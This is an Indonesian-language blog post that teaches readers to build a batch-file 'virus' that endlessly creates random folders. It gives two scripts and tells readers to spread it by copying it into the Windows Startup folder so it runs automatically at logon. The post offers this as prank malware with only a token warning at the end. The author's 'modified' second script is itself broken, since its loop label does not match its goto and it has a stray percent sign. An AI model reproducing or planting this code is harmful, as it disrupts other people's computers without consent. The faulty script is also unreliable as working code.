Saturday, September 1, 2012

Cara Membuat Virus 1.000 Folder Dalam Beberapa Detik

0 comments

Twenty4rt - Di postingan ini saya akan mengajarkan agan cara membuat virus  sederhana, virus ini akan membuat 1000 folder jika ada yang mengkliknya....

Berikut cara membuatnya :


## Langkah - langkahnya :##

1. Buka aplikasi Notepad
2. Lalu boy copas scripat di bawah ini

kode : 1
##########################
@echo off
:top
md %random%
goto top
##########################

Mungkin script  di atas sudah banyak yang postingkan..tapi di sini saya akan memodifikasi supaya lebih keren dan wow gitu,,,,

kode : 2
##########################
@echo off
title twenty
color 09

:twentyb4t

md %random%%

goto twenty
#########################

Nah...beda kan? coba aja surfing di google apa ada script seperti modifan saya........wkwkwkw

3. Lalu Save As dengan formata *.bat [misal contoh twenty.bat ]

taraaaaa dan hasilnya....wooowww keren !!


# cara menyebarkannya #

Cara penyebarannya tergantung dari kreatifitas kamu. cara gua...!!!  agan copy file tadi di StartUp lalu paste.
Nah kalo belum tau startup di mana,,,??? agan tinggal klik start > all programms startup terakhir pastekan di situ.
karena kalo di taro di startup maka file tadi akan jalan secara otomatis.

SELESAI DEH !! Buat orang berdecak kagum.

Saatnya saya bilang WOUWWWW gitoo wkwkwkww




==================================Warning================================

Jangan dipakai untuk yang tidak-tidak !!


Follow me :

Leave a Reply